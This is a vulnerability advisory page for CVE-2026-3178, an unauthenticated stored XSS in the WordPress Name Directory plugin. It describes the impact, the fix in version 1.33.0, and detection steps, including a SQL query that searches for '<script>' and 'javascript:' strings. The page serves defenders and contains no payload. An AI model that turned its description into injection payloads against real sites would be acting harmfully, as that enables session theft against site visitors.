CVE-2026-3178
Stored XSS in WordPress Name Directory Plugin Allows Script Injection
Publication date: 2026-03-11
Last updated on: 2026-03-11
Assigner: Wordfence
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': "CVE-2026-3178 is a Stored Cross-Site Scripting (XSS) vulnerability in the Name Directory plugin for WordPress. It occurs via the 'name_directory_name' parameter in all versions up to and including 1.32.1 due to insufficient input sanitization and output escaping. This flaw allows unauthenticated attackers to inject arbitrary web scripts into pages, which execute whenever a user accesses the injected page."}, {'type': 'paragraph', 'content': "The vulnerability was partially patched in versions 1.30.3 and 1.32.1, and fully addressed in version 1.33.0 by improving input sanitization, output escaping, nonce verification, and permission checks in the plugin's admin and database handling components."}] [1, 2, 3]
How can this vulnerability impact me? :
This vulnerability can allow unauthenticated attackers to inject malicious scripts into the plugin's pages, which will execute in the context of users visiting those pages. This can lead to theft of user credentials, session hijacking, defacement, or redirection to malicious sites.
Because the vulnerability is exploitable without authentication and affects all users who access the injected pages, it poses a significant security risk to website visitors and administrators.
The CVSS v3.1 base score of 7.2 reflects a high severity with network attack vector, low attack complexity, no privileges required, no user interaction needed, and impacts confidentiality and integrity.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves Stored Cross-Site Scripting (XSS) via the 'name_directory_name' parameter in the Name Directory WordPress plugin versions up to 1.32.1. Detection involves identifying if your WordPress installation uses this vulnerable plugin version and checking for suspicious script injections in pages that display directory names.
Since the vulnerability is related to insufficient input sanitization and output escaping, you can detect it by searching for injected scripts in the 'name_directory_name' parameter or in pages that render directory names.
Suggested commands or steps include:
- Check the installed version of the Name Directory plugin to see if it is version 1.32.1 or earlier.
- Use web application scanning tools or manual inspection to look for suspicious script tags or JavaScript code in pages that display directory names.
- On the server, you can grep the WordPress database export or plugin files for suspicious script tags or unusual content in the 'name_directory_name' fields.
- Example command to check plugin version via WP-CLI: `wp plugin list --format=table | grep name-directory`
- Example SQL query to find suspicious scripts in the database (adjust table and column names accordingly): `SELECT * FROM wp_name_directory_names WHERE name_directory_name LIKE '%<script>%' OR name_directory_name LIKE '%javascript:%';`
What immediate steps should I take to mitigate this vulnerability?
[{'type': 'paragraph', 'content': 'The primary mitigation step is to update the Name Directory plugin to version 1.33.0 or later, which includes the security fix for CVE-2026-3178.'}, {'type': 'paragraph', 'content': 'The update improves input sanitization, output escaping, nonce verification, and permission checks to prevent unauthorized script injection and privilege escalation.'}, {'type': 'paragraph', 'content': 'If immediate updating is not possible, consider temporarily disabling the plugin or restricting access to the affected functionality to trusted users only.'}, {'type': 'paragraph', 'content': 'Additionally, review and sanitize any existing entries in the directory that might contain malicious scripts.'}, {'type': 'list_item', 'content': 'Update the Name Directory plugin to version 1.33.0 or later.'}, {'type': 'list_item', 'content': "Restrict access to the plugin's administrative interface using WordPress capability checks or other access control mechanisms."}, {'type': 'list_item', 'content': 'Sanitize existing directory entries to remove any injected scripts.'}, {'type': 'list_item', 'content': 'Monitor your site for suspicious activity or unexpected script execution.'}] [1, 2, 3]